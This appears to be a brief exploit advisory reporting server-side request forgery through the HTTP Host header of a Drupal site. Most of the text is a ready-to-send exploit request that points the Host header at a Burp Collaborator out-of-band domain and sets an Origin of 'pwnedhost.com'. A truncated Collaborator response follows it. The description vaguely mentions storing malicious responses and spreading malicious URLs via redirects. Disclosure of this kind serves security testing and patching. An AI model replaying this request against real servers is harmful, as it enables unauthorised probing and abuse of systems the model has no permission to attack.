## Description:
It is possible to induce the application to perform server-side HTTP
requests to arbitrary domains.
The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was
submitted in the HTTP Host header.
The application performed an HTTP request to the specified domain. For
the second test, the attacker stored a response
on the server with malicious content. This can be bad for a lot of
users of this system if the attacker spreads a malicious URL
and sends it by email etc. By using a redirect exploit.
STATUS: HIGH-Vulnerability
[+]Exploit:
```GET
GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
Accept-Encoding: gzip, deflate, psp4hw87ev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
text/psp4hw87ev
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36 psp4hw87ev
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: https://psp4hw87ev.pwnedhost.com
```
[+]Response from Burpcollaborator server:
```HTTP
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62